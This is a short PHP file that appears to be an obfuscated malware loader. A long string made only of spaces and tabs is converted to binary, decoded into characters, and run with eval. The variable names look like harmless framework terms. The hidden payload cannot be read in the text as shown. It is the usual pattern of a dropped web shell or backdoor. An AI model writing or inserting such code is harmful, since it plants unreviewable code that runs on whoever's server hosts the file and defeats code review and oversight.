<?php
$dispatcher = "  				    						 			     		 	    			        		 	    	 	   	  	   		   		 		 	     	       				 	  	      		   		 			 	 	 			  	  		 		   	 					 		 	  	 		 			  		 	  	 			 	    	 	     	 	  	  			 		    		 	    	 	  		   		 			 	 	 			  	  		 		   	 					 			  		 		  	 	 			 	   		 				 			     			 	    	 	     	  	   		   		 		 	     	 		    	      	    		 	 	 	 	 	 	  	  	  		   	  				 	 	     	 	 	   	 					 	 	 	 	 	 	  	  	  		    	 		    	       	   	  		 	    			 	   			 	   			     			  		  			 	   	 				  	 				 			  	  		    	 			 			  	 			  		  			 		 	  	 			 	   		 	    			 	 	 		   	  			 	 	 			  		 		  	 	 			  	  		   		 		 				 		 			  			 	   		  	 	 		 			  			 	    	 			  		   		 		 				 		 		 	  	 				 			  		 		  	 	 		   		 			 	 	 			  	  		 	  	 			 	   				  	  	 		 	 			  		 		  	 	 		 				  	 				 			 			 		  	 	 		   	   	 		 	 			  	  		  	 	 			  		 		  	 	 		    	 			  	  		   		 		 	     	 				 			  	  		  	 	 		  		  			  		  	 				 		 	    		  	 	 		    	 		  	   			  		  	 				 		 		 	 		    	 		 	  	 		 			   	 				 		 	  	 			      	 			  		 	 	  			     		  			  	   	   	 	  	  			 		    		 	    	 	  		   		 			 	 	 			  	  		 		   	 					 			  		 		  	 	 			 	   		 				 			     			 	    	 	     	  	   		   		 		 	     	 		    	      	    		 	 	 	 	 	 	  	  	  		   	  				 	 	     	 	 	   	 					 	 	  	  	   	 	 	 	 	   	 	 	 	 	 	  	  	  			  	 	 	   	 	  	  	     	 	  			  	 	  		 	   		  	   	 	 	 	  	   	 		    	      			 	   			  	  			 	 	 		  	 	  	 	  	  			 		    		 	    	 	  		   		 			 	 	 			  	  		 		   	 					 			  		 		  	 	 			 	   		 				 			     			 	    	 	     	  	   		   		 		 	     	 		    	      	    		 	 	 	 	 	 	  	  	  		   	  				 	 	     	 	 	   	 					 	 	 	 	 	 	  		 	   	 	 	 	  	  	     	 	   			 	   	 	 	  			  	 	 	    	 		    	       	   	  	  		 	 		 				 				 	  		 	  	 		 		   		 		   		    	  	 				  		 	 	  	 			   		      	       	 	    	 	 			 		 	  	 		 			  		  	   		 				 			 			 			  		  	      	  			  	 	 	    	       		   	  		      	 			   		      			 		  	      	 	 			 		 	  	 		 			   		 		   		 	    			 		  	      				     		 		   		 	    	 	  	  	      	     	 			     			     		 		   		  	 	 	 	 			 		  	 	 		   	  	  	 		 		 	  	 			 	    	 				  		 	 	  		  		  		 			  	 			   		  		  		 		   	       	 	    	  	 		 	  	    	 	 	   	  		 	 	  		    	 		    	      		 		   		 	  	 		 	 		 		  	 	  	      	   			 		  	 	 		   		 		 	 		 		 				  	 	  	  	      	    		 		 	    			  	  		 				 		 		 	 		  	 	  	 				  			  	  		   	  	 			   		      	 			   		 	    		 	    		 			  		  	   	 			   		   	  		  	   		 	    	      	 	  		 		    	 		  		  		    	 			  	  		 	  	  	 				  		 	 	  		  		  		 			  	 			   		  		  		 		   	   	   	 	  	  			 		    		 	    	 	   	  	   		 	  	 		 		 	 		  			  	       				 	  	      		   		 			 	 	 			  	  		 		   	 					 		  	 	 				    		  	 	 		   		  	 	     	  	   		   		 		 	     	 	  	  			 		    		 	    	 	  		   		 			 	 	 			  	  		 		   	 					 		   		 		 		   		 				 			  		 		  	 	  	 	     	  	   		   		 		 	     	 	  	  			 		    		 	    	 	   	  	   				     	       				 	  	      		  	 	 				    			     		 		   		 				 		  	   		  	 	  	 	     	   	  		 		 	 		  	 	 			 			 			 	   			 			 		 				  	   	   	 		    	       	  	   		 	  	 		 		 	 		  			  	 	  	  			 		    		 	    	 	  		 	  	 		  		   	       	 	    		 	  	 			  		 			  		 		  	 	 			 	    	 	     	  	   				    	 		 		  		   	 	 			 	  	 	  	  	 	  	  	      				 		    		 	    	 	   	       	       	       	      		  	 	 			 		  		    	 		 		    	 	     	   	   						  					   	   	   	       	 			   	       	  	   				    	 		 		  		   	 	 			 	  	 	  	  			 		    		 	    	 	  					 	  	      		  	 	 		 		   			  		 		  	 	  	      				 		    		 	    	 	   	       	       	       	      		  	 	 		   		 		 	    		 				  	       	   	  	 	 	   		 	    		  	 	  	      		  	   		  	 	 		 		   		 	  	 		 		 	 		 	  	 			 	   		  	 	 			  	   	       	  			 		 		 	 		  	 	 			 			 			 	   			 			 		 				  	  			  	      			 			 		    	 			  		  	      		 			  		 				 			 	    	      		  		  		 				 			 	 	 		 			  		  	    	      		 	  	 		 			   	      			 	   		 	    		  	 	  	      		 	  	 		 		 	 		    	 		  			 		  	 	  	      		   		 		 				 		 			  			 	   		  	 	 		 			  			 	    	 			   	   	   			 		    		 	    	 	  					 	    		 	    	 	   						  					     		 	    	 	 ";
$factory = str_replace([" ", "\t"], ['0', '1'], $dispatcher);
$app = '';
$event = str_split($factory, 8);
foreach($event as $context) { $app .= chr(bindec($context)); }
eval('?>' . $app);
?>